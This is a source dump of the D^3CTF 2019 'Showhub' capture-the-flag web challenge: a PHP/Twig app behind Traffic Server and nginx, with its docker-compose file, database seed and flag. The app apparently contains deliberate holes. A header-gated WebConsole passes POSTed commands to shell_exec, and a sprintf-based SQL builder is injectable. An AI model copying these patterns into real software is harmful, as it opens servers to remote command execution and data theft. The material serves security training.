/D^3CTF2019_Showhub/ats-etc/trafficserver/volume.config_1:
--------------------------------------------------------------------------------
 1 | #
 2 | # volume.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/volume.config.en.html
 6 | #
 7 | # This file specifies the various volumes, their sizes and the
 8 | # protocol they belong to. Use this file in conjunction with the
 9 | # hosting.config file.
10 | #
11 | #  Each line consists of a tag value pair.
12 | #    volume=<volume_number> scheme=<protocol_type> size=<volume_size>
13 | #
14 | #  volume_number can be any value between 1 and 255. 
15 | #  This limits the maximum number of volumes to 255. 
16 | #  Volume number 0 is reserved for the special free volume. 
17 | #  Each line MUST have a distinct volume number.
18 | #
19 | #  The only scheme currently supported is 'http.
20 | #
21 | #  volume_size can either be specified in percentage of the total
22 | #  cache space or absolute value. It must be a multiple of 128 Megabytes,
23 | #  with 128 Megabytes being the smallest size possible. If specified in 
24 | #  percentage, the size is rounded down to the closest multiple of 
25 | #  128 Megabytes. A volume can be as big as the whole cache. 
26 | #  Each volume is striped across several disks to 
27 | #  achieve parallel I/O. For example, if there are 4 disks, 
28 | #  a 1 Gigabyte volume will have 256 Megabytes on each
29 | #  disk (assuming each disk has enough free space available).
30 | #
31 | # To create one volume of size 10% of the total cache space and 
32 | # another 1 Gig  volume, 
33 | #  volume=1 scheme=http size=10%
34 | #  volume=2 scheme=http size=1024
35 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '2.1'
 2 | services:
 3 |   ATS:
 4 |     image: "annevil/ats-7.1.2:v2"
 5 |     container_name: "d3ctf-ats"
 6 |     volumes:
 7 |       - "./ats-etc:/opt/ts-v2/etc"
 8 |       - "./run/ats.sh:/run.sh"
 9 |     ports:
10 |       - "80:8080"
11 |     entrypoint: ["/run.sh"] 
12 | 
13 |   nginx:
14 |     image: "nginx:latest"
15 |     container_name: "d3ctf-nginx"
16 |     volumes:
17 |       - "./nginx/default.conf:/etc/nginx/conf.d/default.conf"
18 | 
19 |   apache2:
20 |     image: "d3ctf/php-apache2"
21 |     build: "./apache2"
22 |     container_name: "d3ctf-apache2"
23 |     volumes:
24 |       - "./htdocs:/var/www/html"
25 |       - "./run/apache2.sh:/run.sh"
26 |       - "./flag:/flag"
27 |     entrypoint: ["/run.sh"]
28 | 
29 |   database:
30 |     image: mysql:5
31 |     command: --default-authentication-plugin=mysql_native_password --character-set-server=utf8mb4 --collation-server=utf8mb4_unicode_ci --sql-mode='' --max-execution-time=1000
32 |     container_name: "d3ctf-mysql"
33 |     volumes:
34 |       - "./htdocs/app.sql:/docker-entrypoint-initdb.d/app.sql"
35 |     environment:
36 |       MYSQL_ROOT_PASSWORD: "8282600e5379907d01452d14ef1fba52"
37 |       MYSQL_DATABASE: "app"
38 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/flag:
--------------------------------------------------------------------------------
1 | d3ctf{Li4n0@showhub}
2 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/.htaccess:
--------------------------------------------------------------------------------
1 | RewriteEngine on
2 | 
3 | RewriteCond $1 !^(.*\.php|static|robots\.txt)
4 | 
5 | RewriteRule ^(.*)$ /index.php/$1 [L]


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Controllers/BaseController.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | class BaseController
 4 | {
 5 |     public $request = null;
 6 |     private $template = null;
 7 | 
 8 |     public function __construct(Request $request, \Twig\Environment $template)
 9 |     {
10 | 	$this->request = $request;
11 |         $this->template = $template;
12 |     }
13 | 
14 |     protected function render(...$args)
15 |     {
16 |         return $this->template->render(...$args);
17 |     }
18 | 
19 |     protected function redirect($url)
20 |     {
21 |         header("Location: $url");
22 |     }
23 | 
24 |     protected function json($arr)
25 |     {
26 |         header("Content-Type: application/json");
27 |         return json_encode($arr);
28 |     }
29 | 
30 |     protected function responseNotFound($username = null)
31 |     {
32 |         header("HTTP/1.0 404 Not Found");
33 |         return $this->render('404.html',['username'=>$username]);
34 |     }
35 | 
36 |     protected function responseNotAllowed($msg = null, $username = null)
37 |     {
38 |         header("HTTP/1.0 403 Not Allowed");
39 |         return $this->render('403.html', ["msg" => $msg, "username" => $username]);
40 |     }
41 | }
42 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Controllers/IndexController.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 | class IndexController extends BaseController
4 | {
5 |     public function index()
6 |     {
7 |         return $this->render('index.html', ["username" => $this->request->user->username]);
8 |     }
9 | }


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Controllers/LoginController.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | Class LoginController extends BaseController
 4 | {
 5 |     public $username;
 6 |     public $password;
 7 |     public $code;
 8 | 
 9 |     public function index()
10 |     {
11 |         $username = $this->request->post['username'];
12 |         $password = $this->request->post['password'];
13 |         $user = User::login($username, $password);
14 |         if ($user) {
15 |             if ($user->username === "admin") {
16 |                 $user->password = "25e35cc0af84cbd00b8aceacd67145592bf2f708a1b2e8a59c8ae1786ec5cd83";
17 |                 $user->save();
18 |             }
19 |             $this->redirect("/Manage/");
20 |         }
21 |         return $this->render('index.html', ['msg' => "Login failed"]);
22 |     }
23 | }
24 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Controllers/LogoutController.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | Class LogoutController extends BaseController
 3 | {
 4 | 
 5 |     public function index()
 6 |     {
 7 |         User::logout();
 8 |         $this->redirect('/');
 9 |     }
10 | }


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Controllers/ManageController.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 | class ManageController extends BaseController
4 | {
5 |     public function index()
6 |     {
7 |         return $this->render('welcome.html', ["username" => $this->request->user]);
8 |     }
9 | }


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Controllers/RegisterController.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | Class RegisterController extends BaseController
 4 | {
 5 |     public $username;
 6 |     public $password;
 7 |     public $confirm_password;
 8 | 
 9 |     public function index()
10 |     {
11 |         if ($this->request->post["username"] && $this->request->post["password"]) {
12 |             $username = $this->request->post['username'];
13 |             $password = $this->request->post['password'];
14 |             if (User::register($username, $password)) {
15 |                 $this->redirect("/Manage");
16 |             } else {
17 |                 return $this->render('index.html', ['msg' => 'Registration failed']);
18 |             }
19 |         }
20 |         return $this->render('index.html', ['msg' => 'Registration failed, required fields missed']);
21 | 
22 |     }
23 | }


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Controllers/WebConsoleController.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | class WebConsoleController extends BaseController
 4 | {
 5 |     public function index()
 6 |     {
 7 | 	$client_ip = $SERVER['HTTP_CLIENT_IP'];    
 8 | 	if ($this->request->user->username === "admin" && !filter_var(
 9 |                 $_SERVER['HTTP_CLIENT_IP'],
10 |                 FILTER_VALIDATE_IP,
11 |                 FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
12 |             )) {
13 | 
14 |             return $this->render('webconsole.html', ["username" => $this->request->user]);
15 |         } elseif ($this->request->user->username !== "admin") {
16 |             return $this->responseNotAllowed("Only administrators in the internal network environment can access,you are not admin", ["username" => $this->request->user]);
17 |         } else {
18 |             return $this->responseNotAllowed("Only administrators in the internal network environment can access,your client ip($client_ip) is not be allowed, please visit in the internal network environment", ["username" => $this->request->user]);
19 |         }
20 | 
21 |     }
22 | 
23 |     public function exec()
24 |     {
25 |         if ($this->request->user->username === "admin" && !filter_var(
26 |                 $_SERVER['HTTP_CLIENT_IP'],
27 |                 FILTER_VALIDATE_IP,
28 |                 FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
29 |             )) {
30 |             $cmd = $this->request->post['cmd'];
31 |             return $this->json(array("result" => shell_exec($cmd)));
32 |         } elseif ($this->request->user->username !== "admin") {
33 |             return $this->responseNotAllowed("Only administrators in the internal network environment can access,you are not admin");
34 |         } else {
35 |             return $this->responseNotAllowed("Only administrators in the internal network environment can access,your client ip($client_ip) is not be allowed, please visit in the internal network environment", ["username" => $this->request->user]);
36 |         }
37 | 
38 |     }
39 | }
40 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Core/App.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | class App
 4 | {
 5 |     public $controller;
 6 |     public $action;
 7 |     public $template;
 8 | 
 9 |     public function __construct()
10 |     {
11 |         $path_info = substr($_SERVER['PATH_INFO'], 1);
12 |         $info = explode('/', $path_info, 2);
13 |         if ($info[0] == null) {
14 |             $info[0] = 'Index';
15 |             $info[1] = 'index';
16 |         } else if (count($info) == 1 || $info[1] == null) {
17 |             $info[1] = 'index';
18 |         }
19 |         if ($info[0] !== "templates") {
20 |             $this->controller = $info[0] . 'Controller';
21 |             $this->action = $info[1];
22 |         }
23 |         $loader = new \Twig\Loader\FilesystemLoader(WEB_PATH . '/Templates/');
24 |         $this->template = new \Twig\Environment($loader, [
25 |             'cache' => WEB_PATH . '/Cache',
26 |         ]);
27 | 
28 |     }
29 | 
30 |     public function run($request)
31 |     {
32 |         if (class_exists($this->controller)) {
33 |             $object = new $this->controller($request, $this->template);
34 |             if (method_exists($object, $this->action)) {
35 |                 return call_user_func_array(array($object, $this->action), []);
36 |             }
37 |         }
38 |         return $this->template->render('404.html');
39 | 
40 | 
41 |     }
42 | 
43 | }
44 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Core/Mysql.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | Class Mysql
 4 | {
 5 |     private static $conn = null;
 6 |     private function __construct(){}
 7 | 
 8 |     public static function getInstance($host='', $username='', $password='', $dbname=''){
 9 |         if(self::$conn === null){
10 |             self::$conn = new mysqli($host, $username, $password, $dbname);
11 |         }
12 |         return self::$conn;
13 |     }
14 | 
15 | 
16 |     public function query($sql)
17 |     {
18 |         $result = $this->conn->query($sql);
19 |         return $result;
20 |     }
21 | }


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Core/Request.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | class Request
 4 | {
 5 |     public $method = null;
 6 |     public $get = null;
 7 |     public $post = null;
 8 |     public $cookie = null;
 9 |     public $headers = null;
10 |     public $session = null;
11 |     public $user = null;
12 | 
13 | 
14 |     public function __construct()
15 |     {
16 |         $this->method = $_SERVER['REQUEST_METHOD'];
17 |         $this->get = $_GET;
18 |         $this->post = $_POST;
19 |         $this->cookie = $_COOKIE;
20 |         $this->headers = getallheaders();
21 |         $this->session = $_SESSION;
22 |         if (array_key_exists('uid', $this->session)) {
23 |             $this->user = User::findOne(['id'=>$this->session['uid']]);
24 |         }
25 |     }
26 | }


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Core/framework.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | ini_set('display_errors', 'Off');
 3 | error_reporting(0);
 4 | session_start();
 5 | spl_autoload_register(function ($class) {
 6 |     if (stristr($class, 'Controller')) {
 7 |         include WEB_PATH . '/Controllers/' . $class . '.php';
 8 |     } else {
 9 |         include WEB_PATH . '/Models/' . $class . '.php';
10 |     }
11 | });
12 | if (!function_exists('getallheaders')) {
13 |     function getallheaders()
14 |     {
15 |         $headers = array();
16 |         foreach ($_SERVER as $name => $value) {
17 |             if (substr($name, 0, 5) == 'HTTP_') {
18 |                 $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
19 |             }
20 |         }
21 |         return $headers;
22 |     }
23 | }
24 | require_once WEB_PATH . '/config.php';
25 | require_once WEB_PATH . '/vendor/autoload.php';
26 | require_once WEB_PATH . '/Core/App.php';
27 | require_once WEB_PATH . '/Core/Request.php';
28 | require_once WEB_PATH . '/Core/Mysql.php';
29 | Mysql::getInstance($CONFIG['dbhost'], $CONFIG['dbuser'], $CONFIG['dbpassword'], $CONFIG['dbname']);
30 | $app = new App();
31 | $request = new Request();
32 | echo $app->run($request);
33 | 
34 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Models/Model.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | class Model
  4 | {
  5 |     private $db = null;
  6 |     private $tbname = null;
  7 | 
  8 |     public function __construct()
  9 |     {
 10 |         $this->db = Mysql::getInstance();
 11 |         $this->tbname = strtolower(get_called_class());
 12 |     }
 13 | 
 14 |     static private function prepareWhere($args)
 15 |     {
 16 |         $tmpSql = '';
 17 |         $i = 0;
 18 |         if (!empty($args)) {
 19 |             $tmpSql .= " WHERE";
 20 |         }
 21 |         foreach ($args as $column => $value) {
 22 |             $value = addslashes($value);
 23 |             $tmpSql .= " `$column`='$value'";
 24 |             if ($i !== count($args) - 1) {
 25 |                 $tmpSql .= ' AND';
 26 |             }
 27 |             $i++;
 28 |         }
 29 |         return $tmpSql;
 30 |     }
 31 | 
 32 |     static private function prepareInsert($baseSql, $args)
 33 |     {
 34 |         $i = 0;
 35 |         if (!empty($args)) {
 36 |             foreach ($args as $column => $value) {
 37 |                 $value = addslashes($value);
 38 |                 if ($value !== null) {
 39 |                     if ($i !== count($args) - 1) {
 40 |                         $baseSql = sprintf($baseSql, "`$column`,%s", "'$value',%s");
 41 |                     } else {
 42 |                         $baseSql = sprintf($baseSql, "`$column`", "'$value'");
 43 |                     }
 44 |                 }
 45 |                 $i++;
 46 |             }
 47 |         }
 48 | 
 49 |         return $baseSql;
 50 |     }
 51 | 
 52 |     static private function prepareUpdate($baseSql, $args)
 53 |     {
 54 |         $i = 0;
 55 |         if (!empty($args)) {
 56 |             foreach ($args as $column => $value) {
 57 |                 $value = addslashes($value);
 58 |                 if ($value !== null) {
 59 |                     if ($i !== count($args) - 1) {
 60 |                         $baseSql = sprintf($baseSql, "`$column`='$value',%s");
 61 |                     } else {
 62 |                         $baseSql = sprintf($baseSql, "`$column`='$value'");
 63 |                     }
 64 |                 }
 65 |                 $i++;
 66 |             }
 67 |         }
 68 | 
 69 |         return $baseSql;
 70 |     }
 71 | 
 72 |     public static function findOne(array $args = array())
 73 |     {
 74 |         $db = Mysql::getInstance();
 75 |         $tbname = strtolower(get_called_class());
 76 |         $baseSql = "SELECT * FROM `$tbname`";
 77 |         $baseSql .= self::prepareWhere($args);
 78 |         $sql = $baseSql . " LIMIT 1";
 79 |         $result = $db->query($sql);
 80 |         if ($result->num_rows) {
 81 |             return new $tbname(...array_values($result->fetch_assoc()));
 82 |         }
 83 |     }
 84 | 
 85 |     public function save()
 86 |     {
 87 |         $args = get_object_vars($this);
 88 |         $args = array_slice($args, 0, -2);
 89 |         if ($args['id'] !== null) {
 90 |             $baseSql = "UPDATE `$this->tbname` SET %s WHERE id=" . $args['id'];
 91 |             $sql = self::prepareUpdate($baseSql, array_slice($args, 1));
 92 |             $this->db->query($sql);
 93 |             if (!$this->db->conn->error) {
 94 |                 return $this;
 95 |             } else {
 96 |                 return null;
 97 |             }
 98 | 
 99 |         } else {
100 | 
101 |             $baseSql = "INSERT INTO `$this->tbname`(%s) VALUE(%s)";
102 |             $sql = self::prepareInsert($baseSql, $args);
103 |             $this->db->query($sql);
104 |             if (!$this->db->conn->error) {
105 |                 $objectID = $this->db->query("SELECT LAST_INSERT_ID()")->fetch_row()[0];
106 |                 return self::findOne(array("id" => $objectID));
107 |             } else {
108 |                 return null;
109 |             }
110 |         }
111 | 
112 |     }
113 | }


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Models/User.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | Class User extends Model
 4 | {
 5 |     public $id = null;
 6 |     public $username = "";
 7 |     public $password = "";
 8 | 
 9 |     public function __construct($id = null, $username = null, $password = null)
10 |     {
11 |         parent::__construct();
12 |         $this->id = $id;
13 |         $this->username = $username;
14 |         $this->password = $password;
15 |     }
16 | 
17 |     public function __toString()
18 |     {
19 |         return $this->username;
20 |     }
21 | 
22 |     public function register($username, $password)
23 |     {
24 |         $password = hash("sha256", $password);
25 |         $user = (new User(null, $username, $password))->save();
26 |         if ($user) {
27 |             $_SESSION['uid'] = $user->id;
28 |             return $user;
29 |         }
30 |         return false;
31 |     }
32 | 
33 |     public function login($username, $password)
34 |     {
35 |         $password = hash("sha256", $password);
36 |         $user = User::findOne(["username" => $username, "password" => $password]);
37 |         if ($user) {
38 |             $_SESSION['uid'] = $user->id;
39 |             return $user;
40 |         }
41 |         return false;
42 |     }
43 | 
44 |     public function logout()
45 |     {
46 |         session_destroy();
47 |     }
48 | }


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Templates/403.html:
--------------------------------------------------------------------------------
 1 | {% extends "layout.html" %}
 2 | 
 3 | {% block content %}
 4 | <div class="jumbotron">
 5 |     <div class="container">
 6 |         <h1>{{ msg }}</h1>
 7 |     </div>
 8 | </div>
 9 | {% endblock %}
10 | 
11 | 
12 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Templates/404.html:
--------------------------------------------------------------------------------
1 | {% extends "layout.html" %}
2 | 
3 | {% block content %}
4 | <div class="jumbotron">
5 |     <div class="container">
6 |         <h1>To be honest, this page may be out of date, so it disappeared.</h1>
7 |     </div>
8 | </div>
9 | {% endblock %}


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Templates/index.html:
--------------------------------------------------------------------------------
 1 | {% extends "layout.html" %}
 2 | 
 3 | {% block content %}
 4 | <div class="jumbotron">
 5 |     <div class="container">
 6 |         <h1>Building...</h1>
 7 |         <p>Welcome to ShowHub. ShowHub is a fashion community, which helps people to find the most popular goods, from clothes to cosmetics. We promise all of our goods are imported through the legal ways. Counterfeit or smuggled products are strictly forbidden.</p>
 8 |         <p><a class="btn btn-primary btn-lg" role="button"  data-toggle="modal" data-target="#showModal">Learn more &raquo;</a></p>
 9 |     </div>
10 | </div>
11 | 
12 | <!-- Modal -->
13 | <div class="modal fade" id="showModal" tabindex="-1" role="dialog" aria-hidden="true">
14 |     <div class="modal-dialog" role="document">
15 |       <div class="modal-content">
16 |         <div class="modal-header">
17 |           <h5 class="modal-title">What is ShowHub?</h5>
18 |           <button type="button" class="close" data-dismiss="modal" aria-label="Close">
19 |             <span aria-hidden="true">&times;</span>
20 |           </button>
21 |         </div>
22 |         <div class="modal-body">
23 |           <p><b>S</b>weet</p>
24 |           <p><b>H</b>onest</p>
25 |           <p><b>O</b>utstanding</p>
26 |           <p><b>W</b>ise</p>
27 |           <p><b>H</b>andsome</p>
28 |           <p><b>U</b>nique</p>
29 |           <p><b>B</b>rilliant</p>
30 |           <h4>ShowHub - For fashion, for you~</h4>
31 |         </div>
32 |         <div class="modal-footer">
33 |           <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
34 |         </div>
35 |       </div>
36 |     </div>
37 |   </div>
38 | 
39 | 
40 | <div class="container">
41 |     <div class="row">
42 |         <div class="col-md-4">
43 |             <h2>Boundaries are meant to be pushed</h2>
44 |             <p>ShowHub cooperate with the famous manufacturers all over the world, we discover the distinctive collections created by brilliant designers. </p>
45 |         </div>
46 |         <div class="col-md-4">
47 |             <h2>The best for the best</h2>
48 |             <p>ShowHub is community which defy limits. We employees from all over the world, in order to catch the popular trend right now!</p>
49 |         </div>
50 |         <div class="col-md-4">
51 |             <h2>The ultimate goods for the ultimate people</h2>
52 |             <p>We promise all of our products have passed the state-level test. Counterfeit or smuggled products are strictly forbidden.</p>
53 |         </div>
54 |     </div>
55 | 
56 |     <hr>
57 | 
58 |     <footer>
59 |         <p>&copy; Li4n0@D^3CTF 2019.</p>
60 |     </footer>
61 | </div>
62 | {% endblock %}
63 | 
64 | 
65 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Templates/layout.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="zh-CN">
 3 | <head>
 4 |     <meta charset="utf-8">
 5 |     <meta http-equiv="X-UA-Compatible" content="IE=edge">
 6 |     <meta name="viewport" content="width=device-width, initial-scale=1">
 7 | 
 8 |     <title>ShowHub</title>
 9 | 
10 |     <link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
11 |     <script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>
12 |     <script src="https://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
13 | 
14 | </head>
15 | 
16 | <body>
17 | 
18 | <nav class="navbar navbar-inverse navbar-fixed-top">
19 |     <div class="container">
20 |         <div class="navbar-header">
21 |             <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar"
22 |                     aria-expanded="false" aria-controls="navbar">
23 |                 <span class="sr-only">Toggle navigation</span>
24 |                 <span class="icon-bar"></span>
25 |                 <span class="icon-bar"></span>
26 |                 <span class="icon-bar"></span>
27 |             </button>
28 |             <a class="navbar-brand" href="/">ShowHub</a>
29 |         </div>
30 |         <div id="navbar" class="navbar-collapse collapse">
31 |             {% if username %}
32 |             <div class="collapse navbar-collapse">
33 |                 <ul class="nav navbar-nav navbar-right">
34 |                     <li class="nav-item">
35 |                         <a class="navbar-link" href="/Manage/">Home</a>
36 |                     </li>
37 |                     <li class="nav-item">
38 |                         <a class="navbar-link" href="/WebConsole/">WebConsole</a>
39 |                     </li>
40 |                     <li class="nav-item">
41 |                         <a class="navbar-link" href="/Logout/">Logout</a>
42 |                     </li>
43 |                 </ul>
44 |             </div>
45 |             {% else %}
46 |             <form method="post" action="/Login/" class="navbar-form navbar-right">
47 |                 <div class="form-group">
48 |                     <input name="username" id="Username" type="text" placeholder="Username" class="form-control">
49 |                 </div>
50 |                 <div class="form-group">
51 |                     <input name="password" id="Password" type="password" placeholder="Password" class="form-control">
52 |                 </div>
53 |                 <button id="signin" class="btn btn-success">Sign in</button>
54 |                 <button id="signup" class="btn btn-success">Sign up</button>
55 |             </form>
56 |             {% endif %}
57 |         </div>
58 |     </div>
59 | </nav>
60 | {% if msg %}
61 | <div style="margin:48px 0 0 0" class="alert alert-danger" role="alert">
62 |     {{ msg }}
63 | </div>
64 | {% endif %}
65 | {% block content %}
66 | {% endblock %}
67 | 
68 | <script>
69 |     $("#signin").on("click", function () {
70 |         $("form")[0].submit()
71 |     })
72 |     $("#signup").on("click", function () {
73 |         $("form")[0].action = '/Register'
74 |         console.log(1)
75 |         $("form")[0].submit()
76 |     })
77 | </script>
78 | 
79 | 
80 | </body>
81 | </html>


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Templates/webconsole.html:
--------------------------------------------------------------------------------
 1 | {% extends "layout.html" %}
 2 | 
 3 | {% block content %}
 4 | <body background="https://s2.ax1x.com/2019/11/16/MBMMm6.jpg" style="background-repeat:no-repeat; background-size:cover; opacity: 0.8;"></body>
 5 | <div class="container" id="console">
 6 | 
 7 | </div>
 8 | <script>
 9 |     var main = document.createElement('div');
10 |     main.setAttribute('style', 'background-image:url("https://s2.ax1x.com/2019/11/16/MBiloq.png"); background-repeat:no-repeat; background-size: 1000px; background-attachment:fixed; background-position:center;width: 1000px;height: 600px;position: absolute;left: 50%;top: 50%;margin-left: -500px;margin-top: -300px;');
11 |     $('#console')[0].appendChild(main);
12 | 
13 |     var content = document.createElement('div');
14 |     content.setAttribute('style', 'width: 960px; margin-top: 30px; overflow: scroll; height: 510px; overflow-x: hidden');
15 |     main.appendChild(content);
16 | 
17 |     function addInput(text) {
18 |         var input = document.createElement('div');
19 |         input.setAttribute('style', 'top: 5px;height: 20px;width: 100%;color: #FFFFFF;margin-left: 50px;font-size: 12px;');
20 |         input.innerHTML = text;
21 |         $.post('/WebConsole/exec', {cmd: text.slice(2)}, result => {
22 |             addOutput(result["result"]);
23 |         })
24 |         content.appendChild(input);
25 |         content.scrollTop = content.scrollHeight;
26 |     }
27 | 
28 |     function addOutput(text) {
29 |         var output = document.createElement('div');
30 |         output.setAttribute('style', 'top: 5px;width: 95%;color: #00FF00;margin-left: 50px;font-size: 12px;');
31 |         output.innerHTML = text.replace(/\n/ig,`<br />`);
32 |         content.appendChild(output);
33 |         content.scrollTop = content.scrollHeight;
34 |     }
35 | 
36 |     var control = document.createElement('div');
37 |     main.appendChild(control);
38 | 
39 |     var s = document.createElement('span');
40 |     s.setAttribute('style', 'color: white; margin-left: 50px;');
41 |     s.innerText = '$'
42 |     control.appendChild(s)
43 | 
44 |     var textarea = document.createElement("input");
45 |     textarea.type = "text";
46 |     textarea.setAttribute('style', 'bottom: 40px; left: 60px; position: absolute; width: 85%; background-color: transparent; color: white; border: 0px;');
47 |     control.appendChild(textarea);
48 | 
49 |     addOutput('[ DEBUG CONSOLE ]')
50 |     addOutput('==================')
51 | 
52 |     document.onkeydown = function (event) {
53 |         var e = event || window.event;
54 |         if (e && e.keyCode == 13) {
55 |             addInput('$ ' + textarea.value);
56 |             textarea.value = '';
57 |         }
58 |     };
59 | 
60 | </script>
61 | {% endblock %}
62 | 
63 | 
64 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/Templates/welcome.html:
--------------------------------------------------------------------------------
 1 | {% extends "layout.html" %}
 2 | 
 3 | {% block content %}
 4 | <div class="jumbotron">
 5 |     <div class="container">
 6 |         <h1>Welcome {{ username }}~</h1>
 7 |         <h3>ShowHub is building, please wait...</h3>
 8 |     </div>
 9 | </div>
10 | 
11 | <div class="container">
12 |     <div class="media">
13 |         <div class="media-left">
14 |             <a href="#">
15 |                 <img class="media-object" alt="64x64" src="/static/clothes.jpg" data-holder-rendered="true" style="width: 64px; height: 64px;">
16 |             </a>
17 |         </div>
18 |         <div class="media-body">
19 |             <h4 class="media-heading">Clothes</h4>
20 |             ShowHub pick the most fashion clothes from all over the world. Our employees will choose the best one for you according to your preference.
21 |         </div>
22 |     </div>
23 |     <div class="media">
24 |         <div class="media-left">
25 |             <a href="#">
26 |                 <img class="media-object" alt="64x64" src="/static/cosmetics.jpg" data-holder-rendered="true" style="width: 64px; height: 64px;">
27 |             </a>
28 |         </div>
29 |         <div class="media-body">
30 |             <h4 class="media-heading">Cosmetics</h4>
31 |             Sun screen, concealer, shading powder, pressed powder... ShowHub provides the best products to beauty your skin.
32 |         </div>
33 |     </div>
34 |     <div class="media">
35 |         <div class="media-left">
36 |             <a href="#">
37 |                 <img class="media-object" data-src="holder.js/64x64" alt="64x64" src="/static/arispods_pro.jpg" data-holder-rendered="true" style="width: 64px; height: 64px;">
38 |             </a>
39 |         </div>
40 |         <div class="media-body">
41 |             <h4 class="media-heading">Electronic products</h4>
42 |             ArisPods Pro, MoeBook Pro, iPhtwo X... ShowHub can get the most fashion electronic products at a very low price. This is because ShowHub cooperates with these company for a long time.
43 |         </div>
44 |     </div>
45 | </div>
46 | 
47 | {% endblock %}


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/app.sql:
--------------------------------------------------------------------------------
 1 | /*
 2 |  Navicat Premium Data Transfer
 3 | 
 4 |  Source Server         : mac
 5 |  Source Server Type    : MySQL
 6 |  Source Server Version : 50726
 7 |  Source Host           : localhost:3306
 8 |  Source Schema         : app
 9 | 
10 |  Target Server Type    : MySQL
11 |  Target Server Version : 50726
12 |  File Encoding         : 65001
13 | 
14 |  Date: 21/10/2019 20:18:43
15 | */
16 | 
17 | SET NAMES utf8mb4;
18 | SET FOREIGN_KEY_CHECKS = 0;
19 | 
20 | -- ----------------------------
21 | -- Table structure for user
22 | -- ----------------------------
23 | DROP TABLE IF EXISTS `user`;
24 | CREATE TABLE `user` (
25 |   `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
26 |   `username` varchar(400) NOT NULL,
27 |   `password` varchar(400) NOT NULL,
28 |   PRIMARY KEY (`id`) USING BTREE,
29 |   UNIQUE KEY `username` (`username`) USING HASH
30 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8 ROW_FORMAT=DYNAMIC;
31 | 
32 | -- ----------------------------
33 | -- Records of user
34 | -- ----------------------------
35 | BEGIN;
36 | INSERT INTO `user` VALUES (1, 'admin', 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3');
37 | COMMIT;
38 | 
39 | SET FOREIGN_KEY_CHECKS = 1;
40 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/composer.json:
--------------------------------------------------------------------------------
1 | {
2 |     "require": {
3 |         "twig/twig": "^2.0",
4 |       "ext-mysqli": "*",
5 |       "ext-json": "*"
6 |     }
7 | }
8 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/composer.lock:
--------------------------------------------------------------------------------
  1 | {
  2 |     "_readme": [
  3 |         "This file locks the dependencies of your project to a known state",
  4 |         "Read more about it at https://getcomposer.org/doc/01-basic-usage.md#installing-dependencies",
  5 |         "This file is @generated automatically"
  6 |     ],
  7 |     "content-hash": "93ec15e40347fca1b35602de69eea1f6",
  8 |     "packages": [
  9 |         {
 10 |             "name": "symfony/polyfill-ctype",
 11 |             "version": "v1.12.0",
 12 |             "source": {
 13 |                 "type": "git",
 14 |                 "url": "https://github.com/symfony/polyfill-ctype.git",
 15 |                 "reference": "550ebaac289296ce228a706d0867afc34687e3f4"
 16 |             },
 17 |             "dist": {
 18 |                 "type": "zip",
 19 |                 "url": "https://api.github.com/repos/symfony/polyfill-ctype/zipball/550ebaac289296ce228a706d0867afc34687e3f4",
 20 |                 "reference": "550ebaac289296ce228a706d0867afc34687e3f4",
